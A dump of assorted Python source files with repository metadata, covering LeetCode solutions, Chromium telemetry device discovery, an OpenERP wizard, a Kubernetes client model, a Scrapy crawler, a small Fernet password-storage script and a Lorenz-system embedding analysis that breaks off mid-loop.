test_results = estimator.evaluate(input_fn=test_input_fn)
accuracy_score = test_results["accuracy"]
print("\nTest accuracy: %g %%" % (accuracy_score*100))
# Use the print() function (not the Python-2-only statement form) so the
# file stays runnable on both Python 2 and Python 3.
print(test_results)
| [
"1786546913@qq.com"
] | 1786546913@qq.com |
2252aa44817b2d07ab6ed5d0ee6a3517d72f807c | aa7de5b75b65404715676121d61a9b06348d5f62 | /telemetry/telemetry/internal/platform/device_finder.py | 4547ecd20747c41e9da726a41ddad68480306fba | [
"BSD-3-Clause"
] | permissive | benschmaus/catapult | 3ca2ede51e4a23082e634fa07a03c11158bd6d9a | f388b1f6b90c670b6524fd68a295bae26ba8db70 | refs/heads/master | 2021-01-20T07:53:45.431708 | 2017-07-17T18:03:09 | 2017-07-17T18:03:09 | 90,060,605 | 0 | 1 | null | 2017-05-02T17:38:42 | 2017-05-02T17:38:41 | null | UTF-8 | Python | false | false | 1,304 | py | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Finds devices that can be controlled by telemetry."""
from telemetry.internal.platform import android_device
from telemetry.internal.platform import cros_device
from telemetry.internal.platform import desktop_device
DEVICES = [
android_device,
cros_device,
desktop_device,
]
def _GetAllAvailableDevices(options):
  """Returns a list of all available devices."""
  # Flatten the per-backend results into a single list, in DEVICES order.
  return [found
          for module in DEVICES
          for found in module.FindAllAvailableDevices(options)]
def GetDevicesMatchingOptions(options):
  """Returns a list of devices matching the options."""
  requested = options.remote_platform_options.device
  if not requested or requested == 'list':
    # No specific device requested: report everything we can find.
    matching = _GetAllAvailableDevices(options)
  elif requested == 'android':
    matching = android_device.FindAllAvailableDevices(options)
  else:
    # A concrete device guid was requested; filter the full list down.
    matching = [d for d in _GetAllAvailableDevices(options)
                if d.guid == requested]
  matching.sort(key=lambda device: device.name)
  return matching
| [
"commit-bot@chromium.org"
] | commit-bot@chromium.org |
d9d3518697740e62f5fcd78a2d44d8952a390926 | e976eb4db57ddee4947cbab8746446dd53f6cf6f | /101-150/三角形最小路径和.py | ec3af7dda958d297f2e463e0f3c2c521d4e43907 | [] | no_license | Aiyane/aiyane-LeetCode | 5328529079bcfbc84f4e4d67e3d8736b9745dc0d | 3c4d5aacc33f3ed66b6294894a767862170fb4f6 | refs/heads/master | 2020-04-01T20:33:54.125654 | 2019-06-25T09:56:10 | 2019-06-25T09:56:10 | 153,610,015 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 905 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# 三角形最小路径和.py
"""
给定一个三角形,找出自顶向下的最小路径和。每一步只能移动到下一行中相邻的结点上。
例如,给定三角形:
[
[2],
[3,4],
[6,5,7],
[4,1,8,3]
]
自顶向下的最小路径和为 11(即,2 + 3 + 5 + 1 = 11)。
说明:
如果你可以只使用 O(n) 的额外空间(n 为三角形的总行数)来解决这个问题,那么你的算法会很加分。
"""
__author__ = 'Aiyane'
class Solution(object):
    def minimumTotal(self, triangle):
        """
        :type triangle: List[List[int]]
        :rtype: int

        Bottom-up DP using O(n) extra space: fold each row into the
        running best-cost row beneath it.
        """
        if not triangle:
            return 0
        best = list(triangle[-1])
        for row in reversed(triangle[:-1]):
            # Each cell's cost is itself plus the cheaper of its two children.
            best = [cell + min(pair)
                    for cell, pair in zip(row, zip(best, best[1:]))]
        return best[0]
| [
"2310091880qq@gmail.com"
] | 2310091880qq@gmail.com |
d52dadc7c858dec5f454c2bdd7b914dc1e9870c5 | c90b3ac3e5ad11cb93d4e6b76b9b9c4a19d0f512 | /.history/copytest_20200502125750.py | 3f5f083b6c965e4eb030019b5d6986b066591552 | [] | no_license | rbafna6507/passwordstorageproject | 6465585e36c81075856af8d565fe83e358b4a40a | 480c30e358f7902ac0ef5c4e8d9556cb1d6d33f4 | refs/heads/master | 2022-11-25T12:05:02.625968 | 2020-07-27T21:33:38 | 2020-07-27T21:33:38 | 283,021,426 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 953 | py | import pickle
import cryptography
from cryptography.fernet import Fernet
"""def encrypt(message: bytes, key: bytes) -> bytes:
return Fernet(key).encrypt(message)
def decrypt(token: bytes, key: bytes) -> bytes:
return Fernet(key).decrypt(token)
"""
infile = open('jeff.pkl','rb')
z = pickle.load(infile)
key = Fernet.generate_key()
f = Fernet(key)
e_userpass = z
username = input(b"Username: ")
password = input(b"password: ")
website = input("Website: ")
e_username = f.encrypt(username)
e_password = f.encrypt(password)
e_list = [b"Username: " + e_username, b"Password: " + e_password]
e_userpass["Website: " + website] = e_list
outfile = open("jeff.pkl", "wb")
pickle.dump(e_userpass, outfile)
outfile.close()
infile = open('jeff.pkl','rb')
z = pickle.load(infile)
e_userpass = z
j = [e_userpass[k] for k in e_userpass]
for k in j:
for q in k:
decrypt(q)
"""for key, value in d_userpass.items():
print(key, ' : ', value)""" | [
"35872545+rbafna6507@users.noreply.github.com"
] | 35872545+rbafna6507@users.noreply.github.com |
ee82fb7cc4fd156f236ae8bafab57f23b8736e1b | 7b3711d4c6d7284255ba0270d49d120f984bf7c6 | /problems/549_binary_tree_longest_consecutive_sequence_ii.py | 9351f1ab9242d7c976ab632e31e3661c5bf978ce | [] | no_license | loganyu/leetcode | 2d336f30feb55379aaf8bf0273d00e11414e31df | 77c206305dd5cde0a249365ce7591a644effabfc | refs/heads/master | 2023-08-18T09:43:10.124687 | 2023-08-18T00:44:51 | 2023-08-18T00:44:51 | 177,875,222 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,748 | py | '''
Given a binary tree, you need to find the length of Longest Consecutive Path in Binary Tree.
Especially, this path can be either increasing or decreasing. For example, [1,2,3,4] and [4,3,2,1] are both considered valid, but the path [1,2,4,3] is not valid. On the other hand, the path can be in the child-Parent-child order, where not necessarily be parent-child order.
Example 1:
Input:
1
/ \
2 3
Output: 2
Explanation: The longest consecutive path is [1, 2] or [2, 1].
Example 2:
Input:
2
/ \
1 3
Output: 3
Explanation: The longest consecutive path is [1, 2, 3] or [3, 2, 1].
Note: All the values of tree nodes are in the range of [-1e7, 1e7].
'''
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
    """Longest consecutive path (values stepping by exactly 1, increasing or
    decreasing), where the path may pass through a node from one child to
    the other (child-parent-child order is allowed)."""

    def longestConsecutive(self, root: 'TreeNode') -> int:
        # 'TreeNode' is quoted: the class only exists in the judge's harness
        # (see the commented stub above), so a bare annotation would raise
        # NameError the moment this method is defined.
        self.max = 0
        self.longest_path(root)
        return self.max

    def longest_path(self, node):
        """Return (inc, dec): lengths of the longest increasing and
        decreasing runs that start at *node* and go downward.

        Side effect: updates self.max with the best path through *node*.
        """
        if not node:
            return (0, 0)
        inr = dcr = 1
        if node.left:
            l = self.longest_path(node.left)
            if node.val == node.left.val + 1:
                dcr = l[1] + 1
            elif node.val == node.left.val - 1:
                inr = l[0] + 1
        if node.right:
            r = self.longest_path(node.right)
            if node.val == node.right.val + 1:
                dcr = max(dcr, r[1] + 1)
            elif node.val == node.right.val - 1:
                inr = max(inr, r[0] + 1)
        # Best path through this node joins the longest increasing run on
        # one side with the longest decreasing run on the other; the node
        # itself is counted once, hence the -1.
        self.max = max(self.max, dcr + inr - 1)
        return (inr, dcr)
| [
"logan.yu@cadre.com"
] | logan.yu@cadre.com |
39490c4724d2b3f930595661177772125731acc9 | ab79f8297105a7d412303a8b33eaa25038f38c0b | /education/school_transport/wizard/transfer_vehicle.py | 6d509565898bbd75f1f7b57dd95cfd567302c7c2 | [] | no_license | adahra/addons | 41a23cbea1e35079f7a9864ade3c32851ee2fb09 | c5a5678379649ccdf57a9d55b09b30436428b430 | refs/heads/master | 2022-06-17T21:22:22.306787 | 2020-05-15T10:51:14 | 2020-05-15T10:51:14 | 264,167,002 | 1 | 0 | null | 2020-05-15T10:39:26 | 2020-05-15T10:39:26 | null | UTF-8 | Python | false | false | 4,425 | py | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
# Copyright (C) 2011-2012 Serpent Consulting Services (<http://www.serpentcs.com>)
# Copyright (C) 2013-2014 Serpent Consulting Services (<http://www.serpentcs.com>)
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.tools.translate import _
class transfer_vehicle(osv.TransientModel):
    # Wizard (TransientModel) that moves a transport participant from one
    # vehicle to another on the same transport root.
    _name = "transfer.vehicle"
    _description = "transfer vehicle"
    _columns = {
        # Student shown read-only; prefilled from the active record.
        'name':fields.many2one('student.student','Student Name', readonly=True),
        'participation_id':fields.many2one('transport.participant','Participation', required=True),
        'root_id':fields.many2one('student.transport','Root', required=True),
        'old_vehicle_id':fields.many2one('transport.vehicle','Old Vehicle No', required=True),
        'new_vehicle_id':fields.many2one('transport.vehicle','New Vehicle No', required=True),
    }

    def default_get(self, cr, uid, fields, context=None):
        """Prefill the student field from the record the wizard was
        launched on (``context['active_id']``)."""
        if context is None:
            context = {}
        result = super(transfer_vehicle, self).default_get(cr, uid, fields, context=context)
        if context.get('active_id'):
            student = self.pool.get('student.student').browse(cr, uid, context.get('active_id'), context=context)
            if 'name' in fields:
                result.update({'name': student.id})
        return result

    def onchange_participation_id(self, cr, uid, ids, transport, context=None):
        """On participation change, derive its transport root and current
        (old) vehicle so the form fields follow the selection."""
        if not transport:
            return {}
        transport_obj = self.pool.get('transport.participant').browse(cr, uid, transport, context)
        return {'value': {'root_id': transport_obj.transport_id.id, 'old_vehicle_id': transport_obj.vehicle_id.id}}

    def vehicle_transfer(self, cr, uid, ids, context=None):
        """Move the selected participant from the old vehicle to the new one.

        Validates that the two vehicles differ and that the new vehicle has
        room, then rewrites the participant list of both vehicles and the
        participant's own vehicle reference.
        """
        stu_prt_obj = self.pool.get('transport.participant')
        vehi_obj = self.pool.get('transport.vehicle')
        for new_data in self.browse(cr, uid, ids, context=context):
            vehi_data = vehi_obj.browse(cr, uid, new_data.old_vehicle_id.id, context=context)
            vehi_new_data = vehi_obj.browse(cr, uid, new_data.new_vehicle_id.id, context=context)
            # check for transfer in same vehicle
            if new_data.old_vehicle_id.id == new_data.new_vehicle_id.id:
                raise osv.except_osv(_('Error !'),_('Sorry you can not transfer in same vehicle.'))
            # First Check Is there vacancy or not
            # NOTE(review): `participant` is presumably the current head count
            # on the OLD vehicle; checking the NEW vehicle's count looks more
            # natural here -- confirm against transport.vehicle.
            person = int(vehi_data.participant) + 1
            if vehi_data.capacity < person:
                raise osv.except_osv(_('Error !'),_('There is No More vacancy on this vehicle.'))
            # remove entry of participant in old vehicle.
            participants = [prt_id.id for prt_id in vehi_data.vehi_participants_ids]
            participants.remove(new_data.participation_id.id)
            vehi_obj.write(cr, uid, new_data.old_vehicle_id.id, {'vehi_participants_ids':[(6,0,participants)]}, context=context)
            # entry of participant in new vehicle.
            participants = [prt_id.id for prt_id in vehi_new_data.vehi_participants_ids]
            participants.append(new_data.participation_id.id)
            vehi_obj.write(cr, uid, new_data.new_vehicle_id.id, {'vehi_participants_ids':[(6,0,participants)]}, context=context)
            # finally repoint the participant itself at the new vehicle
            stu_prt_obj.write(cr, uid, new_data.participation_id.id, {'vehicle_id': new_data.new_vehicle_id.id,}, context=context)
        return {}

# Instantiation registers the wizard with the ORM (legacy OpenERP 6 API).
transfer_vehicle()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| [
"prog1@381544ba-743e-41a5-bf0d-221725b9d5af"
] | prog1@381544ba-743e-41a5-bf0d-221725b9d5af |
990dbb97b825729a03f9e35c2c4534b21c1a05e4 | 2a171178942a19afe9891c2425dce208ae04348b | /kubernetes/client/models/v1alpha1_certificate_signing_request_status.py | 7d4e56624b8742735902dccd5ab749de8d607509 | [
"Apache-2.0"
] | permissive | ouccema/client-python | ac3f1dee1c5ad8d82f15aeecb87a2f5f219ca4f4 | d7f33ec53e302e66674df581904a3c5b1fcf3945 | refs/heads/master | 2021-01-12T03:17:54.274888 | 2017-01-03T22:13:14 | 2017-01-03T22:13:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,830 | py | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.5.0-snapshot
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pprint import pformat
from six import iteritems
import re
class V1alpha1CertificateSigningRequestStatus(object):
    """
    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    """
    def __init__(self, certificate=None, conditions=None):
        """
        V1alpha1CertificateSigningRequestStatus - a model defined in Swagger

        :param dict swaggerTypes: The key is attribute name
                                  and the value is attribute type.
        :param dict attributeMap: The key is attribute name
                                  and the value is json key in definition.
        """
        self.swagger_types = {
            'certificate': 'str',
            'conditions': 'list[V1alpha1CertificateSigningRequestCondition]'
        }

        self.attribute_map = {
            'certificate': 'certificate',
            'conditions': 'conditions'
        }

        self._certificate = certificate
        self._conditions = conditions

    @property
    def certificate(self):
        """
        Gets the certificate of this V1alpha1CertificateSigningRequestStatus.
        If request was approved, the controller will place the issued certificate here.

        :return: The certificate of this V1alpha1CertificateSigningRequestStatus.
        :rtype: str
        """
        return self._certificate

    @certificate.setter
    def certificate(self, certificate):
        """
        Sets the certificate of this V1alpha1CertificateSigningRequestStatus.
        If request was approved, the controller will place the issued certificate here.

        :param certificate: The certificate of this V1alpha1CertificateSigningRequestStatus.
        :type: str
        """
        self._certificate = certificate

    @property
    def conditions(self):
        """
        Gets the conditions of this V1alpha1CertificateSigningRequestStatus.
        Conditions applied to the request, such as approval or denial.

        :return: The conditions of this V1alpha1CertificateSigningRequestStatus.
        :rtype: list[V1alpha1CertificateSigningRequestCondition]
        """
        return self._conditions

    @conditions.setter
    def conditions(self, conditions):
        """
        Sets the conditions of this V1alpha1CertificateSigningRequestStatus.
        Conditions applied to the request, such as approval or denial.

        :param conditions: The conditions of this V1alpha1CertificateSigningRequestStatus.
        :type: list[V1alpha1CertificateSigningRequestCondition]
        """
        self._conditions = conditions

    def to_dict(self):
        """
        Returns the model properties as a dict
        """
        result = {}

        # Iterating the dict's keys directly behaves identically on
        # Python 2 and 3 and drops the runtime dependency on six.iteritems.
        for attr in self.swagger_types:
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value

        return result

    def to_str(self):
        """
        Returns the string representation of the model
        """
        return pformat(self.to_dict())

    def __repr__(self):
        """
        For `print` and `pprint`
        """
        return self.to_str()

    def __eq__(self, other):
        """
        Returns true if both objects are equal
        """
        # Guard against operands without __dict__ (e.g. str, int), which
        # previously raised AttributeError instead of returning False.
        if not isinstance(other, V1alpha1CertificateSigningRequestStatus):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """
        Returns true if both objects are not equal
        """
        return not self == other
| [
"mehdy@google.com"
] | mehdy@google.com |
c4e9f6e335fa168175f5e5b8bf42d3dcdb16c8d4 | b59e093876a78054bf58ae16fa245bace5d924a2 | /maxWidthRamp.py | fb91dfb4aae2584c36dc9a7c834098301dea7ae2 | [] | no_license | NeilWangziyu/Leetcode_py | 539551585413e1eebd6e6175ba3105c6bc17e943 | 4105e18050b15fc0409c75353ad31be17187dd34 | refs/heads/master | 2020-04-08T03:50:05.904466 | 2019-10-15T07:13:49 | 2019-10-15T07:13:49 | 158,991,828 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,746 | py | class Solution(object):
def maxWidthRamp(self, A):
"""
:type A: List[int]
:rtype: int
"""
if not A:
return 0
if len(A) < 2:
return 0
res = 0
for i in range(len(A)):
for j in range(i+1, len(A)):
if A[i] <= A[j]:
res = max(res, j-i)
return res
def maxWidthRamp2(self, A):
if not A:
return 0
if len(A) < 2:
return 0
A_list = sorted(range(len(A)), key=lambda x:A[x])
last = len(A)
res = 0
for each in A_list:
if each < last:
last = each
else:
res = max(res, each - last)
return res
def maxWidthRamp3(self, A):
"""
:type A: List[int]
:rtype: int
"""
re = 0
stack = []
for i in range(len(A)):
if len(stack) == 0 or A[stack[-1]] > A[i]: # 防止下标越界,不用A[i]>A[i+1}
print(A[i])
stack.append(i) # stack中存放下标 ,按值升序
print(stack)
for j in range(len(A) - 1, re - 1, -1): # 最大堆的左端肯定在单调栈内
print(j, stack)
while stack and A[stack[-1]] <= A[j]:
k = j - stack.pop() # 对于栈顶元素来说不可能有更大值, 因此pop出
re = max(re, k) # 找到每个单调递增堆中元素的最大宽度坡,max即为整个数组最终结果
return re
# Quick manual check against the two LeetCode 962 examples (expect 4 and 7).
solver = Solution()
for sample in ([6, 0, 8, 2, 1, 5], [9, 8, 1, 0, 1, 9, 4, 0, 4, 1]):
    print(solver.maxWidthRamp3(sample))
| [
"noreply@github.com"
] | NeilWangziyu.noreply@github.com |
049cb528754542f06ea9fb36b875d4720677fdeb | 5de14b0e96e17822aafdd0658aef846693db2786 | /app/core/tests/tests_admin.py | fbce74a7b8516edecfa5f3236de2aa61dfbd05bd | [
"MIT"
] | permissive | mahinm20/recipe-app-api | 392a6cec214d54522cd7ebbb21bb4a443ab8d6ef | f9d6c69ae71cdd3c265f50b503cb027c6cb307a9 | refs/heads/master | 2022-10-05T01:03:19.799872 | 2020-06-07T21:25:05 | 2020-06-07T21:25:05 | 264,731,945 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,279 | py | from django.test import TestCase, Client
from django.contrib.auth import get_user_model
from django.urls import reverse
class AdminSiteTests(TestCase):
    """Integration tests for the custom user model in the Django admin."""

    def setUp(self):
        """Create a logged-in superuser plus one regular user fixture."""
        self.client = Client()
        self.admin_user = get_user_model().objects.create_superuser(
            email='mahinmalhotra20@gmail.com',
            password='mala2028',
        )
        self.client.force_login(self.admin_user)
        self.user = get_user_model().objects.create_user(
            email='testing@alala.com',
            password='password123',
            name='Frank Costanza',
        )

    def test_users_listed(self):
        """Test that users are listed on the user page"""
        response = self.client.get(reverse('admin:core_user_changelist'))
        self.assertContains(response, self.user.name)
        self.assertContains(response, self.user.email)

    def test_user_page_change(self):
        """Test that the user edit page works"""
        response = self.client.get(
            reverse('admin:core_user_change', args=[self.user.id])
        )
        self.assertEqual(response.status_code, 200)

    def test_create_user_page(self):
        """Test that the create user page works"""
        response = self.client.get(reverse('admin:core_user_add'))
        self.assertEqual(response.status_code, 200)
#
# from django.test import TestCase
# from django.contrib.auth import get_user_model
# from django.urls import reverse
# from django.test import Client
#
#
# class AdminSiteTests(TestCase):
#
# def setUp(self):
# self.client = Client()
# self.admin_user = get_user_model().objects.create_superuser(
# email='admin@londonappdev.com',
# password='password123'
# )
# self.client.force_login(self.admin_user)
# self.user = get_user_model().objects.create_user(
# email='test@londonappdev.com',
# password='password123',
# name='Test User Full Name',
# )
#
# def test_users_listed(self):
# """Test that users are listed on the user page"""
# url = reverse('admin:core_user_changelist')
# res = self.client.get(url)
#
# self.assertContains(res, self.user.name)
# self.assertContains(res, self.user.email)
| [
"mahinmalhotra20@gmail.com"
] | mahinmalhotra20@gmail.com |
486f1f5d15eb52bf0fc58132dc6ea64812ba691a | d274e22b1cc5d546855fe46b089b13cfe2f4047c | /september2020/solutions/day03_RepeatedSubstringPattern.py | bb4d713142470f406a4f140eab73257325d2f299 | [] | no_license | varunkumar032/lockdown-leetcode | ca6b7a8133033110680dd226c897dd8a1482682b | 15a72a53be9005eca816f018cb1b244f2aa4cdfb | refs/heads/master | 2023-06-30T08:31:54.323747 | 2021-07-12T11:29:59 | 2021-07-12T11:29:59 | 260,616,280 | 0 | 0 | null | 2021-05-06T10:24:48 | 2020-05-02T04:52:37 | Python | UTF-8 | Python | false | false | 728 | py | # Given a non-empty string check if it can be constructed by taking a substring of it and
# appending multiple copies of the substring together.
# You may assume the given string consists of lowercase English letters only and its length
# will not exceed 10000.
# Example 1:
# Input: "abab"
# Output: True
# Explanation: It's the substring "ab" twice.
# Example 2:
# Input: "aba"
# Output: False
# Example 3:
# Input: "abcabcabcabc"
# Output: True
# Explanation: It's the substring "abc" four times. (And the substring "abcabc" twice.)
def repeatedSubstringPattern(s):
for i in range(len(s)//2):
substring = s[:i+1]
if len(s)%len(substring)==0 and substring*(len(s)//len(substring))==s:
return True
return False
| [
"varunkumar032@gmail.com"
] | varunkumar032@gmail.com |
588a8a5be895bf8a6ad7215fca32c5d78ead3cf1 | 7202b4cf562fcacf2f684c1985b448b5780c4967 | /alds1/05d.py | c2600d1dd7eb418017cba2b350db2a0f9c426f45 | [] | no_license | mskt4440/AOJ | ce523182dbd75e85c1bba43d7d23217711b8e617 | f6d9ca36e77a88ed9ddbeb53340a745bf8cac157 | refs/heads/master | 2021-07-07T00:34:23.034606 | 2020-09-24T02:25:43 | 2020-09-24T02:25:43 | 188,768,314 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 829 | py | #
# alds1 05d
#
def merge(A, left, mid, right):
count = 0
L = A[left:mid]
R = A[mid:right]
L.append(1000000001)
R.append(1000000001)
i, j = 0, 0
for k in range(left, right):
if L[i] <= R[j]:
A[k] = L[i]
i += 1
else:
A[k] = R[j]
j += 1
if L[i] != 1000000001:
count += mid + j - k - 1
return count
def mergesort(A, left, right):
if left + 1 < right:
mid = (left + right) // 2
countL = mergesort(A, left, mid)
countR = mergesort(A, mid, right)
return merge(A, left, mid, right) + countL + countR
return 0
def main():
n = int(input())
A = list(map(int, input().split()))
ans = mergesort(A, 0, n)
print(ans)
if __name__ == '__main__':
main()
| [
"mskt4440@gmail.com"
] | mskt4440@gmail.com |
8762b8e7d197c08bf7bf83f303877557b9522988 | f50f1aa1f8f139d546db3230a1cb1f53043fd9e6 | /util/admin/utempter/actions.py | 8c7613e8e50b84e6a3887ce3173972ecb7f86f3e | [] | no_license | pars-linux/corporate2 | 7887961d1552d39bc3b0bef4a60fd3413d9b82bb | 14d1eacfc824fb8d0bff8173e7ac06b36b88d10d | refs/heads/master | 2020-05-26T15:02:12.005654 | 2017-02-27T03:07:14 | 2017-02-27T03:07:14 | 82,476,084 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 615 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2005 TUBITAK/UEKAE
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
from pisi.actionsapi import autotools
from pisi.actionsapi import pisitools
from pisi.actionsapi import shelltools
from pisi.actionsapi import get
def build():
    """Compile utempter, forcing immediate symbol binding at link time."""
    hardened_ldflags = "%s -Wl,-z,now" % get.LDFLAGS()
    shelltools.export("LDFLAGS", hardened_ldflags)
    autotools.make('RPM_OPT_FLAGS="%s"' % get.CFLAGS())
def install():
    """Install into the package root and ship the utmp helper binary."""
    install_args = 'RPM_BUILD_ROOT="%s" LIBDIR=/usr/lib' % get.installDIR()
    autotools.rawInstall(install_args)
    pisitools.dobin("utmp")
| [
"eki@420bcd57-4a62-4fd6-832e-5ede16c90cc9"
] | eki@420bcd57-4a62-4fd6-832e-5ede16c90cc9 |
84090d40ff2316d42b863fad8d472445fab799f6 | 1dca0675aa9c56bc13d2423362e21914c9426cfa | /web_29_jul_dev_8220/wsgi.py | e17ecdf2603d683b1472cb55c3f5b29a649233af | [] | no_license | crowdbotics-apps/web-29-jul-dev-8220 | 9c5a1ba90482dde61d8ec4f0e6ba9bc8f28b71cb | 5583b4280a97c8269a36265bf56c27c3c6515e54 | refs/heads/master | 2022-11-29T05:14:25.319284 | 2020-07-29T05:09:48 | 2020-07-29T05:09:48 | 283,399,990 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 415 | py | """
WSGI config for web_29_jul_dev_8220 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os

from django.core.wsgi import get_wsgi_application

# Point Django at this project's settings module unless the environment
# already specifies one (e.g. in a deployment-specific wrapper script).
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "web_29_jul_dev_8220.settings")

# Module-level WSGI callable picked up by servers such as gunicorn/uWSGI.
application = get_wsgi_application()
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
06b9b4cd93422773c9648fa9e62d931e63211375 | 357b233baba79125936def2065cdb7d20008b06e | /scraper/spiders/bilkent_turkish_writings.py | e3f4f5788e139e2e565a4f9229211db4945f1685 | [] | no_license | selimfirat/bilkent-turkish-writings-dataset | 00e7bf8d83f21ce54705022887ad49ab54e8fbcd | be662fd50987a653071af0673e1247fb4c4ce7ed | refs/heads/master | 2021-05-08T14:33:35.472323 | 2018-02-04T15:59:27 | 2018-02-04T15:59:27 | 120,089,498 | 41 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,038 | py | import scrapy
from scrapy import Request
from scrapy.linkextractors.lxmlhtml import LxmlLinkExtractor
from writing_entry import WritingEntry
class BilkentTurkishWritingsSpider(scrapy.Spider):
    """Crawl stars.bilkent.edu.tr and collect links to Turkish writings.

    Every in-domain link is followed recursively; URLs containing
    ``ogrenciNo`` identify individual writings and are gathered into a
    ``WritingEntry`` whose ``file_urls`` the FilesPipeline downloads.

    (The previous no-op ``__init__`` override, which only forwarded to
    ``super().__init__``, has been removed.)
    """

    name = "bilkent_turkish_writings"
    custom_settings = {
        # FilesPipeline downloads every URL listed in WritingEntry.file_urls.
        "ITEM_PIPELINES": {
            'scrapy.pipelines.files.FilesPipeline': 100
        },
        # Be polite to the university server.
        "DOWNLOAD_DELAY": 0.25,
        "FILES_STORE": '../data/'
    }
    start_urls = ["https://stars.bilkent.edu.tr/turkce/"]
    allowed_domains = ['stars.bilkent.edu.tr']

    def parse(self, response):
        """Collect writing URLs on this page and recurse into other pages."""
        print('Parsing ' + response.url)
        file_urls = []
        for link in LxmlLinkExtractor(allow=self.allowed_domains).extract_links(response):
            if "ogrenciNo" in link.url:
                # Direct link to a writing: queue it for download.
                file_urls.append(link.url)
            else:
                # Navigation link: crawl it with this same callback.
                yield Request(link.url, self.parse)
        yield WritingEntry(file_urls=file_urls)
| [
"yilmazselimfirat@gmail.com"
] | yilmazselimfirat@gmail.com |
4eb07103153cd420fa53c7b6c7e7f84d5bc4c189 | 9cfdc1373b59b92121a0a4ab795a395ac8440fbf | /python/false_nearest_neighbours.py | c5ca028d352032a8575fd13ac8e1c99f4829885b | [] | no_license | physycom/metnum | ae1da308ba333dd036dea46319c45c2ba81bd1ca | cb114bb49062f9a9ec165e294a05b24663c60f17 | refs/heads/master | 2023-04-01T07:30:21.122348 | 2023-03-22T16:06:27 | 2023-03-22T16:06:27 | 34,463,378 | 4 | 6 | null | 2018-03-23T21:59:19 | 2015-04-23T15:04:48 | C++ | UTF-8 | Python | false | false | 2,205 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Mar 19 22:30:58 2018
@author: NICO
"""
import numpy as np
import matplotlib.pylab as plt
import scipy
# SciPy subpackages are not guaranteed to be importable as attributes of the
# bare `scipy` module (lazy attribute loading only exists in SciPy >= 1.8),
# so import the distance functions explicitly.
from scipy.spatial.distance import pdist, squareform

# --- Integrate the Lorenz system with explicit Euler steps ---
dt = .01
it = 10000
sigma = 16.
b = 4.
r = 45.92
x, y, z = np.empty(shape=(it)), np.empty(shape=(it)), np.empty(shape=(it))
x[0], y[0], z[0] = 10, 1, 1
# Lorenz vector-field components.
Vx = lambda x, y, sigma : sigma*(y-x)
Vy = lambda x, y, z, r : -x*z + r*x - y
Vz = lambda x, y, z, b : -b*z + x*y
for i in range(0, it-1):
    x[i+1] = x[i] + dt*Vx(x[i], y[i], sigma)
    y[i+1] = y[i] + dt*Vy(x[i], y[i], z[i], r)
    z[i+1] = z[i] + dt*Vz(x[i], y[i], z[i], b)

# --- False Nearest Neighbours: estimate the optimal embedding dimension ---
RT = 15  # relative-distance threshold
AT = 2   # attractor-size threshold
sigmay = np.std(x)  # NOTE(review): the embedding below is built from y, so np.std(y) may be intended -- confirm
maxEmbDim = 10
delay = 1
rEEM = it - (maxEmbDim*delay - delay)
# Delay-embedding matrix built from the y component.
EEM = np.concatenate([y[delay*maxEmbDim-delay:].reshape(1, len(y[delay*maxEmbDim-delay:])),
                      [y[delay*maxEmbDim-(i+1)*delay:-i*delay] for i in range(1, maxEmbDim)]
                      ], axis=0).T
Ind1 = np.empty(maxEmbDim)
Ind2 = np.empty(maxEmbDim)
embedm = 0  # only for plot
for k in range(1, maxEmbDim+1):
    # Pairwise Euclidean distances between all k-dimensional embedded points.
    D = squareform(pdist(EEM[:, :k], "euclidean"))
